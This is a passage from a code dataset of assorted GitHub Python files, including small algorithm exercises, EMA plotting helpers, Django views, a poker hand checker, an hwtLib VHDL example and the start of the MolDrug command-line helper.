pos2 = openBracketPos\n\n    closeBracketPos = line.find('>', pos1)\n    if closeBracketPos != -1 and closeBracketPos < pos2 :\n        pos2 = closeBracketPos\n    \n    # Cut from pos1 to pos2 \n    fnName = line[pos1:pos2]\n\n    # List the api name if unique \n    if not fnName in fnNames :\n        fnNames.append(fnName)\n\nf.close()\n\nwith open('/home/kwanghyun_su/pk_base_usage_unique_new.txt', 'w') as of :\n    for name in fnNames :\n        of.write(name + \"\\n\")\n\n","repo_name":"KyleJung0828/env","sub_path":"scripts/getFnUsages.py","file_name":"getFnUsages.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43588306557","text":"from greenlet import greenlet\n# from flask import Flask\n# app = Flask(__name__)\n\n\ndef func1():\n    # step 1\n    print(1)\n    # step 2: switch to func2 and run it\n    gr2.switch()\n    # step 5\n    print(2)\n    # step 6: switch back to func2\n    gr2.switch()\n\n\ndef func2():\n    # step 3\n    print(3)\n    # step 4: switch back to func1\n    gr1.switch()\n    # step 7\n    print(4)\n\n\n# create the greenlets, passing in func1 and func2\ngr1 = greenlet(func1)\ngr2 = greenlet(func2)\n\n\n# run func1\ngr1.switch()\n","repo_name":"ChenYibin23/python","sub_path":"单线程异步协程/greenlet.py","file_name":"greenlet.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28449051192","text":"# EMAHelperFunctions.py\n\n#################################################################\n\n## Libraries\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n################################################################\n\n## Exponential Moving Average (EMA) Functions\n\n# Calculate the alpha value for a desired period.\ndef calculateAlpha(ema_period):\n    alpha = 2.0 / (ema_period + 1)\n    return alpha\n\n\n# Returns the denominator\ndef getDenominator(number_of_terms):\n    # bottom = 1 + (1-a) + (1-a)^2 + (1-a)^3 + ...\n    a = calculateAlpha(number_of_terms)\n    i = 0\n    total = 0\n    while i < number_of_terms:\n        term = (1-a)**i\n        total = total + term\n        i = i + 1\n    return total\n\n\n# Returns the numerator\ndef getNumerator(price_data, price_data_index, number_of_terms):\n    # top = p1 + (1-a)*p2 + (1-a)^2*p3 + (1-a)^3*p4 + ...\n    a = calculateAlpha(number_of_terms)\n    i = 0\n    total = 0\n    while i < number_of_terms:\n        price = price_data[price_data_index - i]\n        cof = (1-a)**i\n        term = price * cof\n        total = total + term\n        i = i + 1\n    return total\n\n\n# Returns a single Exponential Moving Average 
value.\ndef getEMA(price_data, price_data_index, number_of_terms):\n    if (number_of_terms - price_data_index) > 1:\n        # There are too many terms for the given index.\n        return 0\n    else:\n        top = getNumerator(price_data, price_data_index, number_of_terms)\n        bottom = getDenominator(number_of_terms)\n        EMA = np.array([top / bottom])\n        return EMA\n\n    \n# Returns a list of all EMA values.\ndef getEMAdataset(price_data, number_of_terms):\n    ema_data = np.zeros(np.size(price_data))\n    i = 0\n    while i < np.size(price_data):\n        datum = getEMA(price_data, i, number_of_terms)\n        ema_data[i] = datum\n        i = i + 1\n    return ema_data\n\n\n\n####################################################################\n\n## Plotting Function\n\n# Plots 3 lines: raw data, EMA(period_1), EMA(period_2)\ndef calculateAndPlotEMA(data, ema_period_1, ema_period_2):\n    ema_1 = getEMAdataset(data, ema_period_1)\n    ema_2 = getEMAdataset(data, ema_period_2)\n    x = np.arange(len(data))\n    plt.plot(x, data)\n    plt.plot(x, ema_1)\n    plt.plot(x, ema_2)\n    ema_legend_text_1 = \"EMA(\" + str(ema_period_1) + \")\"\n    ema_legend_text_2 = \"EMA(\" + str(ema_period_2) + \")\"\n    plt.legend(['Value', ema_legend_text_1, ema_legend_text_2])\n    plt.title(\"Exponential Moving Averages\")\n    plt.grid(b=True, which='major', color='gray', linestyle=':')\n    plt.show()\n    \n########################################################################\n\n## Sine Wave Function\n\n# Generates a sine wave.\ndef generateSineWave(period, amplitude, sigma, end):\n    # Equations\n    alpha = amplitude / 2.0\n    beta = 2.0 * np.pi / period\n    frequency = 1.0 / period\n    x = np.arange(end + 1)\n    \n    # Formula\n    y = alpha * np.sin(beta * x) + sigma\n    return y\n","repo_name":"kilolux/fsp-demos","sub_path":"EMAHelperFunctions.py","file_name":"EMAHelperFunctions.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"45110889676","text":"from django.shortcuts import render\n#from django.http import HttpResponse\nfrom base.forms import ContatoForm, ReservaForm\nfrom base.models import Contato\n\ndef inicio(request):\n    return render(request, 'inicio.html')\n\ndef contato(request):\n    sucesso = False\n    form = ContatoForm(request.POST or None)\n    if form.is_valid():\n        sucesso = True\n        form.save()\n    contexto = {\n        'telefone': '(99) 99999.9999',\n        'responsavel': 'Jackson Moreira',\n        'form': form,\n        'sucesso': sucesso\n    } \n    return render(request, 'contato.html', contexto)\n\ndef reserva_banho(request):\n    sucesso = False\n    if request.method == 'GET':\n        form = ReservaForm()\n    else:\n        form = ReservaForm(request.POST)\n        if form.is_valid():\n            sucesso = True\n    contexto = {\n        # input() would block the web server process; read the submitted values\n        # from the request instead (field names assumed to match the context keys)\n        'nomepet': request.POST.get('nomepet', ''),\n        'telefone': request.POST.get('telefone', ''),\n        'dia': request.POST.get('dia', ''),\n        'mensagem': request.POST.get('mensagem', ''), \n        'form': form,\n        'sucesso': sucesso\n    }\n    return render(request, 'reserva_banho.html', contexto)","repo_name":"JacksonSMoreira/petshop_isa","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14332154386","text":"\n#\n# array = list()\n\narray = [4,3,12,14,43,2,1,33,22,5]\n\n# size = int(input(\"Enter the size of array : \"))\n\n\n\n# for index in range(size):\n#     number = int(input(f\"array[{index}] : \"))\n#     array.append(number)\n\ndef insertion_sort(array):\n\n    if array[0] > array[1]:\n        temp = array[0]\n        array[0] = array[1]\n        array[1] = temp\n\n    for i in range(2, len(array)):\n\n        j = i\n        while j > 0 
and array[j] <= array[j-1]:\n            temp = array[j]\n            array[j] = array[j-1]\n            array[j - 1] = temp\n            j -= 1\n\n\n\nprint(array)\ninsertion_sort(array)\nprint(array)\n\n","repo_name":"Black-Spades-Z/Computer_Algorithms","sub_path":"Insertion_Sort.py","file_name":"Insertion_Sort.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12743720078","text":"def nextLargerNodes(head):\n    \"\"\"\n    :type head: ListNode\n    :rtype: List[int]\n    \"\"\"\n    result = []\n    stack = []\n    i = 0\n    while head:\n        result.append(0)\n        while stack and stack[-1][1] < head.val:  # compare the stored value, not the [index, value] pair\n            result[stack.pop()[0]] = head.val\n        stack.append([i, head.val])\n        i += 1\n        head = head.next\n    return result","repo_name":"hlcr/Leetcode","sub_path":"1019.py","file_name":"1019.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1959254673","text":"import json\n\n\ndef parseData(squadData):\n    squadData = squadData[\"data\"]\n    titles = []\n    qCount = []\n\n    for data in squadData:\n        qas = []\n        count = 0\n\n        titles.append(data[\"title\"])\n\n        for _data in data[\"paragraphs\"]:\n            qas.append(_data[\"qas\"])\n\n        for _data in qas:\n            for _ in _data:\n                count += 1\n\n        qCount.append(count)\n    \n    print(len(titles),len(qCount))\n\n    with open(\"counts.txt\", \"w+\") as f:\n        for count in qCount:\n            count = str(count) + \"\\n\"\n            f.write(count)\n\n\nif __name__ == \"__main__\":\n    # Read Questions from json\n    with open(\"squadData.json\") as data:\n        data = json.load(data)\n\n    parseData(data)\n","repo_name":"saurav-singh/Exatas","sub_path":"Squad Analysis/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28507477909","text":"'''Implement an Elevator class. The class must have a lift method responsible for calling the lift.\r\nAdding/subtracting instances of the class must return the value of the mathematical operation performed.\r\nIf a subtraction is performed on a lift that has not yet made any rides, an invalid-operation error must be reported.\r\nProvide a way to compare which of the lifts has made the greater number of rides.\r\nIt is also necessary to keep a count of the total number of rides of all lifts.\r\nFor string operations, detailed information about the lift must be printed: its name,\r\nits number of rides and its percentage of the total rides of all lifts.'''\r\n\r\n\r\nclass Elevator:\r\n    total = 0\r\n\r\n    def __init__(self):\r\n        self.call_lift = 0\r\n\r\n    def lift(self):\r\n        Elevator.total += 1\r\n        self.call_lift += 1\r\n        print(self.call_lift)\r\n        return self.call_lift\r\n\r\n    def __sub__(self, value):\r\n        try:\r\n            if self.call_lift == 0:\r\n                raise MyError\r\n        except MyError:\r\n            print('Error! this lift was not called')\r\n        if isinstance(value, Elevator):  # accept either an Elevator or a plain number\r\n            value = value.call_lift\r\n        return self.call_lift - value\r\n\r\n    def __rsub__(self, value):\r\n        try:\r\n            if self.call_lift == 0:\r\n                raise MyError\r\n        except MyError:\r\n            print('Error! this lift was not called')\r\n        return value - self.call_lift\r\n\r\n    def __add__(self, value):\r\n        return value + self.call_lift\r\n\r\n    def __radd__(self, value):\r\n        return self.call_lift + value\r\n\r\n    @staticmethod\r\n    def percent(value):\r\n        return value/(Elevator.total/100)\r\n\r\n\r\nclass MyError(Exception):  # exceptions must derive from Exception, not Elevator\r\n    pass\r\n\r\n\r\ndef my_percent(): # asking about name lift and print percent of total\r\n    print('your lifts: ' + str(list_name))\r\n    for_per = input('enter name lift: ')\r\n    if for_per in list_name:\r\n        ind_per = list_name.index(for_per)\r\n        print('percentage of total ' + str(Elevator.percent(list_obj[ind_per].call_lift)))\r\n    else:\r\n        print('check input name and try again')\r\n        my_percent()\r\n    return\r\n\r\n\r\ndef mat_op(): # all mathematical operations\r\n    op = input('What do you want? addition - a, subtraction - s, percent - p, greatest value call - g? ')\r\n    if op == 'a': # asking 2 names lift and printing add\r\n        print('your lifts: ' + str(list_name))\r\n        first_lift = input('enter name first lift: ')\r\n        second_lift = input('enter name second lift: ')\r\n        if first_lift and second_lift in list_name:\r\n            ind1 = list_name.index(first_lift)\r\n            ind2 = list_name.index(second_lift)\r\n            print('your result add ' + str(list_obj[ind1] + list_obj[ind2]))\r\n            navigation()\r\n        else:\r\n            print('check input names and try again')\r\n            mat_op()\r\n\r\n    elif op == 's': # asking 2 names lift and printing sub\r\n        print('your lifts: ' + str(list_name))\r\n        first_lift = input('enter name first lift: ')\r\n        second_lift = input('enter name second lift: ')\r\n        if first_lift and second_lift in list_name:\r\n            ind1 = list_name.index(first_lift)\r\n            ind2 = list_name.index(second_lift)\r\n            print('your result sub ' + str(list_obj[ind1] - list_obj[ind2]))\r\n            navigation()\r\n        else:\r\n            print('check input names and try again')\r\n            mat_op()\r\n    elif op == 'p': # asking about name lift and displays percentage of total\r\n        my_percent()\r\n        navigation()\r\n    elif op == 'g': # asking about names 2 lifts and displays the name with the most elevations\r\n        print('your lifts: ' + str(list_name))\r\n        first_lift = input('enter name first lift: ')\r\n        second_lift = input('enter name second lift: ')\r\n        if first_lift and second_lift in list_name:\r\n            ind1 = list_name.index(first_lift)\r\n            ind2 = list_name.index(second_lift)\r\n            if list_obj[ind1] > list_obj[ind2]:\r\n                print('this lift caused more ' + first_lift)\r\n            else:\r\n                print('this lift caused more ' + second_lift)\r\n        else:\r\n            print('check input names and try again')\r\n            mat_op()\r\n    else:\r\n        print('i do not know what you want')\r\n        navigation()\r\n\r\n\r\ndef navigation():\r\n    nav = input('What will we do? s - start call lift, c - calculation, e - exit ')\r\n    if nav == 's':\r\n        start_l()\r\n    elif nav == 'c':\r\n        mat_op()\r\n    elif nav == 'e':\r\n        exit()\r\n    else:\r\n        print('i do not know this command')\r\n        navigation()\r\n\r\n\r\ndef start_l(): # overloads method lift, ask about name for loads\r\n    start_lift = input('what lift need call? 
' + str(list_name) + ': ')\r\n    if start_lift in list_name:\r\n        ind = list_name.index(start_lift)\r\n        list_obj[ind].lift()\r\n        start_l()\r\n    else:\r\n        print('this lift does not exist')\r\n        navigation()\r\n\r\nlift_num = int(input('enter number of lifts: ')) # numbers of obj\r\nlist_name = [input('enter name lift: ') for i in range(lift_num)] # name for all obj\r\nlist_obj = [Elevator() for j in list_name] # make obj for each name\r\n\r\nstart_l()\r\n","repo_name":"dekamiron/my_first_attempt","sub_path":"homeWork09/task00.py","file_name":"task00.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12912420799","text":"#2. Write functions to:\n#    a. Generate a list of 50 random numbers from 1 to 100.\n#    b. Take a list as a parameter and return True if it contains any\n#    repeated element. The function must not modify the list.\n#    c. Take a list as a parameter and return a new list with the unique elements\n#    of the original list, regardless of order.\n#    Combine these three functions in a single program\n\n\nimport random\n\n\ndef crearlista(elementos):\n    lista = []\n    for i in range(elementos):\n        lista.append(random.randint(0, 100))\n    return lista\n\n\ndef repeticionvalorlista(lista):\n    \"\"\"Checks whether a list has repeated elements\"\"\"\n    rep = False\n    for i in range(len(lista)):\n        if lista.count(lista[i]) > 1:\n            rep = True\n            break\n    return rep\n\n\ndef borrarrepetidos(lista):\n    \"\"\"Takes a list and returns another with the unique elements\"\"\"\n    nuevalista = []\n    for i in range(len(lista)):\n        if lista.count(lista[i]) == 1:\n            nuevalista.append(lista[i])\n    return nuevalista\n\nelementos = random.randint(1, 50)\nresultadolista = crearlista(elementos)\nprint(\"lista original: \", resultadolista, len(resultadolista))\nrep = repeticionvalorlista(resultadolista)\n\nif rep:\n    unicos = borrarrepetidos(resultadolista)\n    print(\"hay elementos repetidos\",end=\",\")\n    if len(unicos) > 0:\n        print(\"los elementos unicos en la lista son: \", unicos)\n    else:\n        print(\"no habia elementos unicos en la lista\")\nelse:\n    print(\"no hay elementos repetidos\")\n    print(\"lista original: \", resultadolista)\n","repo_name":"Danisdnk/PythonExerciseGuide","sub_path":"TP2/2.2.py","file_name":"2.2.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38173048721","text":"'''\r\nThis code checks if there is any winning category. A check is made against each winning category starting from the highest ranking\r\ncategory. 
If a winning category is found the winning combination is returned or else a 'False' is returned.\r\n'''\r\nfrom cards import Deck\r\nfrom cards import Card\r\nfrom functools import reduce\r\nfrom collections import Counter\r\n\r\ndef is_consecutive(list, count): \r\n    ''' Function checks if there is a certain number of consecutive cards'''\r\n    consecutive_count = 0\r\n    for i in range(len(list) - 1):\r\n        if list[i] + 1 == list[i+1]:\r\n            consecutive_count += 1\r\n            if consecutive_count == count-1:\r\n                return True\r\n        else:\r\n            consecutive_count = 0\r\n    return False\r\n\r\ndef find_consecutive_values(list, count): \r\n    ''' Function finds consecutive cards if any and returns it'''\r\n    for i in range(len(list) - count + 1):\r\n        if all(list[i+j] == list[i+j+1] - 1 for j in range(count - 1)):\r\n            return list[i:i+count]\r\n    return []\r\n\r\ndef repeating_items(list, count): \r\n    ''' Function checks if there are pairs and checks for the number of pairs found'''\r\n    repeating=[]\r\n    dictionary = {}\r\n    \r\n    for item in list:\r\n        if item not in dictionary:\r\n            dictionary[item] = 1\r\n        else:\r\n            dictionary[item] += 1\r\n    \r\n    for key, value in dictionary.items():\r\n        if value == count:\r\n            repeating.append(key)\r\n    \r\n    return repeating\r\n\r\n\r\n#----------------------------------------------------------------------------------------\r\n\r\ndef one_pair(community,p):\r\n    ''' Function checks if one pair category is being fulfilled. If yes the winning combination is returned\r\n    else a 'False' is returned. '''\r\n    winning_combo=[]\r\n    p_values=[] #stores ranks of cards \r\n    p_com= reduce(lambda x, y: x + y, [community,p])\r\n    for i in p_com:\r\n        p_values.append((i.get_value()))\r\n    repeating_elements=repeating_items(p_values,2)\r\n\r\n    if len(repeating_elements) == 1:\r\n        for j in p_com:\r\n            if j.get_value()==repeating_elements[0]:\r\n                winning_combo.append(j)  # append the matching card j, not the stale loop variable i\r\n    else:\r\n        return False  \r\n    \r\n    return winning_combo\r\n\r\ndef two_pair(community,p):\r\n    ''' Function checks if two pair category is being fulfilled. If yes the winning combination is returned\r\n    else a 'False' is returned. '''\r\n    winning_combo=[]\r\n    p_values=[] #stores ranks of cards\r\n    p_com= reduce(lambda x, y: x + y, [community,p])\r\n    for i in p_com:\r\n        p_values.append((i.get_value()))\r\n    repeating_elements=repeating_items(p_values,2)\r\n\r\n    if len(repeating_elements) == 2:\r\n        for x in range(2):\r\n            for j in p_com:\r\n                if j.get_value()==repeating_elements[x-1]:\r\n                    winning_combo.append(j)\r\n    else:\r\n        return False  \r\n    \r\n    return winning_combo\r\n\r\ndef three_of_a_kind(community,p):\r\n    ''' Function checks if three of a kind category is being fulfilled. If yes the winning combination is returned\r\n    else a 'False' is returned. '''\r\n    winning_combo=[]\r\n    p_values=[] #stores ranks of cards\r\n    p_com= reduce(lambda x, y: x + y, [community,p])\r\n    for i in p_com:\r\n        p_values.append((i.get_value()))\r\n\r\n    repeating_elements = repeating_items(p_values,3)\r\n    \r\n    if len(repeating_elements)>0:\r\n        for j in p_com:\r\n            if j.get_value()==repeating_elements[0]:\r\n                winning_combo.append(j)    \r\n\r\n    if len(winning_combo) ==3:\r\n        return winning_combo\r\n    else:\r\n        return False\r\n    \r\n\r\ndef straight(community,p):\r\n    ''' Function checks if straight category is being fulfilled. If yes the winning combination is returned\r\n    else a 'False' is returned. 
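A straight needs five consecutive distinct ranks, so duplicates are removed before the sorted values are scanned.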
'''\r\n p_values=[] #stores ranks of cards \r\n win=[]\r\n winning_combo=[]\r\n p_com= reduce(lambda x, y: x + y, [community,p])\r\n for i in p_com:\r\n p_values.append((i.get_value()))\r\n sorted_p=sorted(list(set((p_values)))) #removes duplicate values and then sorts\r\n result=is_consecutive(sorted_p,5) #checks if has 5 consecutive values\r\n if result == True:\r\n combo=find_consecutive_values(sorted_p,5)\r\n for j in combo:\r\n win.append(p_values.index(j)) \r\n\r\n for h in win:\r\n winning_combo.append(p_com[h]) \r\n \r\n if len(winning_combo)>0:\r\n return winning_combo\r\n else:\r\n return False\r\n\r\ndef flush(community,p):\r\n ''' Function checks if flush category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n p_values=[] #stores ranks of cards\r\n p_com= reduce(lambda x, y: x + y, [community,p])\r\n \r\n for i in p_com:\r\n p_values.append((i.get_suit()))\r\n repeat_suit=repeating_items(p_values,5)\r\n \r\n if len(repeat_suit)>0:\r\n winning_combo=[]\r\n for j in p_com:\r\n if j.get_suit()==repeat_suit[0]:\r\n winning_combo.append(j)\r\n return winning_combo\r\n else:\r\n return False\r\n\r\ndef full_house(community,p):\r\n ''' Function checks if full house category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n is_three_of_kind=three_of_a_kind(community,p)\r\n is_one_pair=one_pair(community,p) \r\n if is_three_of_kind and is_one_pair:\r\n winning_combo=reduce(lambda x, y: x + y, [is_three_of_kind,is_one_pair])\r\n return winning_combo\r\n else:\r\n return False\r\n\r\ndef four_of_a_kind(community,p):\r\n ''' Function checks if four of a kind category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n winning_combo=[]\r\n p_values=[] #stores ranks of cards\r\n p_com= reduce(lambda x, y: x + y, [community,p])\r\n for i in p_com:\r\n p_values.append((i.get_value()))\r\n\r\n repeating_elements = repeating_items(p_values,4)\r\n \r\n if len(repeating_elements)>0:\r\n for j in p_com:\r\n if j.get_value()==repeating_elements[0]:\r\n winning_combo.append(j) \r\n\r\n if len(winning_combo) ==4:\r\n return winning_combo\r\n else:\r\n return False\r\n \r\ndef straight_flush(community,p):\r\n ''' Function checks if straight flush category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n straight_combo=[]\r\n winning_combo=[]\r\n is_straight=straight(community,p)\r\n is_flush=flush(community,p)\r\n if is_straight and is_flush:\r\n straight_combo=straight(is_flush,p)\r\n winning_combo=straight_combo\r\n if len(winning_combo)>0:\r\n return winning_combo\r\n else:\r\n return False\r\n \r\n# --------------------------------------------------------------------------------------------------------\r\ndef check(community,p):\r\n ''' Function checks if any one of the categories is being filled. Order of checking starts with highest ranking and\r\n search terminates as soon as first category is fulfilled. 
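Hands that match no category fall through to the ('Nothing', False) result.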
'''\r\n if straight_flush(community,p):\r\n return (\"Straight Flush\",straight_flush(community,p))\r\n elif four_of_a_kind(community,p):\r\n return (\"Four of a Kind\",four_of_a_kind(community,p))\r\n elif full_house(community,p):\r\n return (\"Full house\",full_house(community,p))\r\n elif flush(community,p):\r\n return (\"Flush\",flush(community,p))\r\n elif straight(community,p):\r\n return (\"Straight\",straight(community,p))\r\n elif three_of_a_kind(community,p):\r\n return (\"Three of a kind\",three_of_a_kind(community,p))\r\n elif two_pair(community,p):\r\n return (\"Two Pair\",two_pair(community,p))\r\n elif one_pair(community,p):\r\n return(\"One Pair\",one_pair(community,p))\r\n else:\r\n return (\"Nothing\", False)\r\n\r\n'''\r\nTesting the code:\r\nTesting phase 1: creating cards\r\n----\r\nc1=Card()\r\nc2=Card()\r\nc3=Card()\r\nc4=Card()\r\nc5=Card()\r\nc6=Card()\r\nc7=Card()\r\nc8=Card()\r\nc9=Card()\r\nc1.set_rank(8)\r\nc1.set_suit(1)\r\n\r\nc2.set_rank(8)\r\nc2.set_suit(2)\r\n\r\nc3.set_rank(8)\r\nc3.set_suit(4)\r\n\r\nc4.set_rank(9)\r\nc4.set_suit(4)\r\n\r\nc5.set_rank(12)\r\nc5.set_suit(4)\r\n\r\nc6.set_rank(11)\r\nc6.set_suit(4)\r\n\r\nc7.set_rank(10)\r\nc7.set_suit(4)\r\n-----\r\n\r\nTesting phase 2: Manually assigning cards to check if category checks function as intended\r\n\r\n\r\ncommunity=[c1,c2,c3,c4,c5]\r\np1=[c6,c7]\r\n'''\r\n\r\n\r\n\r\n\r\n","repo_name":"ghc4716/Poker-CLI-Game","sub_path":"categorycheck.py","file_name":"categorycheck.py","file_ext":"py","file_size_in_byte":8375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40284308754","text":"import sys\ninput = lambda : sys.stdin.readline()\ncase = 0\n\nwhile True:\n R, N = list(map(int, input().split()))\n if R == 0 or N == 0:\n break\n case += 1\n\n res, rem = divmod(R-N, N)\n res += 1 if rem else 0\n if 0 <= res <= 26:\n print(\"Case %d: %d\" %(case,res))\n else:\n print(\"Case %d: impossible\" %(case))\n\n","repo_name":"ZenithZyf/Codes","sub_path":"UVa/11723-NumberingRoads.py","file_name":"11723-NumberingRoads.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25871689421","text":"S = input()\n\nduck = {'q':0,'u':1,'a':2,'c':3,'k':4}\n\nqueue = []\nanswer = 0\nfor sound in S:\n flag = True\n for ind in range(len(queue)):\n if (queue[ind] + 1)%5 == duck[sound]:\n queue[ind] = (queue[ind] + 1)%5\n flag = False\n break\n if flag:\n if duck[sound] != 0:\n answer = -1\n break\n queue.append(0)\n\n\nif answer == -1:\n print(-1)\nelse:\n for num in queue:\n if num != 4:\n print(-1)\n break\n else:\n print(len(queue))\n","repo_name":"gkgg123/TIL_new","sub_path":"알고리즘/백준/12933_오리_version2.py","file_name":"12933_오리_version2.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17409414785","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom hwt.hdl.types.bits import Bits\nfrom hwt.interfaces.std import Signal\nfrom hwt.synthesizer.unit import Unit\nfrom hwtLib.examples.base_serialization_TC import BaseSerializationTC\n\n\nclass VhdlVectorAutoCastExample(Unit):\n\n def _declr(self):\n std_logic = Bits(1)\n std_logic_vector_0 = Bits(1, force_vector=True)\n\n self.a = Signal(dtype=std_logic)\n self.b = Signal(dtype=std_logic)._m()\n\n self.c = Signal(dtype=std_logic_vector_0)._m()\n\n self.d = Signal(dtype=std_logic_vector_0)\n self.e = 
Signal(dtype=std_logic)._m()\n\n self.f = Signal(dtype=std_logic)\n self.g = Signal(dtype=std_logic_vector_0)\n\n self.i = Signal(dtype=std_logic)._m()\n\n self.j = Signal(dtype=std_logic)._m()\n\n def _impl(self):\n # no conversion\n self.b(self.a)\n\n # std_logic -> std_logic_vector\n self.c(self.a)\n # std_logic_vector -> std_logic\n self.e(self.d)\n\n # unsigned(std_logic) + unsigned(std_logic_vector) -> std_logic_vector -> std_logic\n self.i(self.f + self.g)\n\n # unsigned(std_logic) + unsigned(std_logic_vector) -> std_logic_vector -> std_logic\n self.j(self.g + self.f)\n\n\nclass VhdlVectorAutoCastExampleTC(BaseSerializationTC):\n __FILE__ = __file__\n\n def test_vhdl(self):\n u = VhdlVectorAutoCastExample()\n self.assert_serializes_as_file(u, \"VhdlVectorAutoCastExample.vhd\")\n\n\nif __name__ == '__main__':\n from hwt.synthesizer.utils import to_rtl_str\n from hwt.serializer.vhdl import Vhdl2008Serializer\n\n u = VhdlVectorAutoCastExample()\n print(to_rtl_str(u, Vhdl2008Serializer))\n\n import unittest\n testLoader = unittest.TestLoader()\n # suite = unittest.TestSuite([VhdlVectorAutoCastExampleTC(\"test_vhdl\")])\n suite = testLoader.loadTestsFromTestCase(VhdlVectorAutoCastExampleTC)\n runner = unittest.TextTestRunner(verbosity=3)\n runner.run(suite)\n","repo_name":"Nic30/hwtLib","sub_path":"hwtLib/examples/arithmetic/vhdl_vector_auto_casts.py","file_name":"vhdl_vector_auto_casts.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"7426623186","text":"import os\nimport random\n\ntopfolder = 'images/'\ninfotext = 'annotations/list.txt'\n\nfile1 = open(infotext, 'r')\nLines = file1.readlines()\n\n\nfor idx,l in enumerate(Lines):\n s = l.split()\n if s[2] == str(2):\n species = 'dog/'\n else:\n species = 'cat/'\n r = random.random()\n if r > 0.9:\n os.rename(topfolder + s[0] + '.jpg', 'sortedimages/test/' + species + s[0] + '.jpg')\n elif r > 0.85:\n os.rename(topfolder + s[0] + '.jpg', 'sortedimages/val/' + species + s[0] + '.jpg')\n else:\n os.rename(topfolder + s[0] + '.jpg', 'sortedimages/train/' + species + s[0] + '.jpg')\n","repo_name":"HannahKuehn/DeepLearningProject","sub_path":"imagesortertotalbinary.py","file_name":"imagesortertotalbinary.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19156760776","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nFor information of MolDrug:\n Docs: https://moldrug.readthedocs.io/en/latest/\n Source Code: https://github.com/ale94mleon/moldrug\n\"\"\"\nfrom moldrug import utils, constraintconf, __version__\nimport yaml, argparse, inspect, os, sys, datetime\nfrom rdkit import Chem\n\nclass CommandLineHelper:\n def __init__(self, parser) -> None:\n self.args = parser.parse_args()\n self.yaml_file = self.args.yaml_file\n self.fitness = self.args.fitness\n self.outdir = self.args.outdir\n self.continuation = self.args.continuation\n self._set_attributes()\n\n def _set_attributes(self):\n # Get and set configuration\n self._set_config()\n # It will generate costfunc attribute\n self._set_costfunc()\n # it will generate the attribute TypeOfRun\n self._set_TypeOfRun()\n # it will generate the attributes: MainConfig, FollowConfig, InitArgs, CallArgs and MutableArgs\n self._translate_config()\n # Here FollowConfig is updated and the corresponded initialization occurs if self.continuation.\n # pbz2 and new_maxiter attributes are 
generated\n self._set_init_MolDrugClass()\n\n\n def _set_config(self):\n with open(self.yaml_file, 'r') as c:\n self.configuration = yaml.safe_load(c)\n\n def _split_config(self):\n config = self.configuration.copy()\n MainConfig = config.pop(list(config.keys())[0])\n FollowConfig = config\n return MainConfig, FollowConfig\n\n def _set_costfunc(self):\n if self.fitness:\n # If the fitness module provided is not in the current directory or if its name is not fitness\n # Create the module inside MolDrug\n if self.outdir:\n if not os.path.exists(self.outdir): os.makedirs(self.outdir)\n destination_path = os.path.join(self.outdir, 'CustomMolDrugFitness.py')\n else:\n destination_path = 'CustomMolDrugFitness.py'\n with open(self.fitness, 'r') as source:\n with open(destination_path, 'w') as destination:\n destination.write(source.read())\n # Changing to the outdir path if provided\n if self.outdir: os.chdir(self.outdir)\n sys.path.append('.')\n import CustomMolDrugFitness\n\n costfunc = dict(inspect.getmembers(CustomMolDrugFitness))[self._split_config()[0]['costfunc']]\n else:\n from moldrug import fitness\n costfunc = dict(inspect.getmembers(fitness))[self._split_config()[0]['costfunc']]\n self.costfunc = costfunc\n\n def _set_TypeOfRun(self):\n self._TypeOfRun_str = self._split_config()[0]['type'].lower()\n if self._TypeOfRun_str == 'ga':\n self.TypeOfRun = utils.GA\n elif self._TypeOfRun_str == 'local':\n self.TypeOfRun = utils.Local\n else:\n raise NotImplementedError(f\"\\\"{self._split_config()[0]['type']}\\\" it is not a possible type. Select from: GA or Local\")\n\n def _translate_config(self):\n MainConfig, FollowConfig = self._split_config()\n\n # Convert the SMILES (or path to compress_pickle) to RDKit mol (or list of RDkit mol)\n if self._TypeOfRun_str == 'local':\n MainConfig['seed_mol'] = Chem.MolFromSmiles(MainConfig['seed_mol'])\n else:\n # TODO make clear errors in case the path does not exist or it was not possible to create a molecule\n if 